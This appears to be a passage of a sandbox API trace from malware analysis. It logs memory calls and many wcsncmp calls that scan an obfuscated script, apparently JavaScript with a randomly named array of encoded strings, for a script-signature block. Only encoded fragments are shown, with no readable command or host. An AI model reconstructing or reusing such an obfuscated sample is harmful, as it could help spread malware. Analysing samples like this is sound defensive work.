5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0084.123] realloc (_Block=0x43dfd0, _Size=0x96d0) returned 0x43dfd0
	[0084.123] ??2@YAPEAX_K@Z () returned 0x30eaf0
	[0084.124] free (_Block=0x43dfd0) 
	[0084.124] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.124] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.124] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.124] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.124] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.124] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.124] CoUninitialize () 
	[0084.124] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.124] CloseHandle (hObject=0x140) returned 1
	[0084.124] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0084.124] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0084.124] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.124] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0084.124] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0084.124] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0084.124] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0084.124] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0084.124] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.124] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.124] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0084.124] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0084.124] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.124] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0084.124] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.124] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0084.124] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0084.124] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.124] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0084.124] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0084.124] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0084.125] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0084.125] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0084.125] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.125] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.125] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0084.125] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0084.125] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0084.125] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.125] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0084.125] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.125] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.125] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0084.125] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0084.125] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0084.125] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.125] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0084.125] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0084.125] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0084.125] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0084.125] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0084.125] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.125] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.125] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.125] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0084.125] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.125] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.125] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0084.125] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0084.125] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0084.125] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.125] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.125] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0084.125] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.125] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0084.125] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0084.125] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.125] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.125] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.125] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0084.126] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0084.126] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0084.126] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0084.126] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0084.126] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.126] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.126] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.126] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0084.126] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.126] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.126] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.126] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0084.126] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.126] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0084.126] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.126] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.126] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0084.126] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.126] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.126] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.126] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0084.126] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.126] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0084.126] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0084.126] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0084.126] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0084.126] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0084.126] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.126] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0084.126] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0084.126] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.126] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.126] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0084.126] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0084.126] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.126] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.126] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0084.126] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0084.126] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0084.127] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0084.127] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0084.127] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.127] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0084.127] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0084.127] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.127] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0084.127] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.127] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.127] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.127] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.127] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.127] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0084.127] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0084.127] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0084.127] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.127] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0084.127] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.127] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0084.127] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0084.127] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.127] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.127] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0084.127] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0084.127] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0084.127] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0084.127] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.127] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.127] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.127] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0084.127] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.127] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0084.127] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0084.127] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.127] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.127] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0084.127] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0084.127] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0084.128] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0084.128] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.128] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.128] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0084.128] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.128] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0084.128] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.128] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.128] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0084.128] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0084.128] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0084.128] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0084.128] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.128] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.128] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.128] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0084.128] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0084.128] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.128] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0084.128] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0084.128] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.128] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.128] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0084.128] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0084.128] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.128] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
